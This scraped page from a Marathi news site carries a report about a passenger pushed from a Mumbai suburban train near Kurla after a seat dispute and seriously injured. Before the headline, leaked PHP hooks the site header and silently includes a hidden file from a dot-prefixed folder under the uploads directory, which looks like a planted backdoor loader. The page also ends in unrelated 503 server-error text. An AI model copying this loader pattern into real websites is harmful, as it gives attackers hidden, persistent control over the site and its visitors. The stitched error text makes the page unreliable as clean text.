add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); उपनगरी रेल्वेतून प्रवाशाला ढकलले – SOCH INDIA
Menu

अपराध समाचार
उपनगरी रेल्वेतून प्रवाशाला ढकलले

nobanner

आसन देण्यावरून झालेल्या वादामुळे एका प्रवाशाला उपनगरी रेल्वेमधून ढकलल्याचा प्रकार कुर्ला रेल्वे स्थानकाजवळ गुरुवारी घडला. विजयकुमार गुप्ता (वय ३५, रा. मानखुर्द) असे या प्रवाशाचे नाव असून, यात ते गंभीर जखमी झाले आहेत.

गुप्ता हे सकाळी ८.५२ वाजता मानखुर्द येथून सीएसएमटीकडे जाणाऱ्या उपनगरी रेल्वेतून प्रवास करीत होते. या प्रवासादरम्यान आसन देण्यावरून गुप्ता यांचा तीन ते चार प्रवाशांसोबत वाद झाला. वादाची परिणती धक्काबुक्कीत झाली.

उपनगरी रेल्वे कुर्ला स्थानकात पोहोचत असतानाच चार प्रवाशांनी गुप्ता यांना लोकलमधून ढकलले. रुळावर पडल्यानंतर रेल्वेचे चाक हातावरून गेल्याने त्यांच्या हाताला गंभीर इजा झाली.

हाताला गंभीर दुखापत

हा प्रकार निदर्शनास येताच लोहमार्ग पोलीस व प्रवासी त्यांच्या मदतीला धावले. जखमी अवस्थेतच आपल्या मोबाइलवरून गुप्ता यांनी पत्नी अनिताशी संपर्क केला व घडलेली घटना सांगितली. त्यानंतर पोलिसांनी शीव येथील लोकमान्य टिळक रुग्णालयात त्यांना दाखल केले. यासंदर्भात वडाळा लोहमार्ग पोलीस ठाण्याचे वरिष्ठ पोलीस निरीक्षक आर.आर. पाल यांनी चार जणांविरोधात गुन्हा दाखल केल्याचे सांगितले. गुन्ह्य़ाचा उलगडा करण्यासाठी वाशी ते सीएसएमटीपर्यंतच्या सर्व स्थानकातील सीसीटीव्ही चित्रण तपासले जाणार आहे. सध्या विजयकुमार गुप्ता गंभीर जखमी असून बेशुद्धावस्थेत आहेत. त्यांनी पत्नीला दिलेल्या माहितीवरून तक्रार दाखल करण्यात आली आहे.

503 Service Unavailable

Service Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

Additionally, a 503 Service Unavailable error was encountered while trying to use an ErrorDocument to handle the request.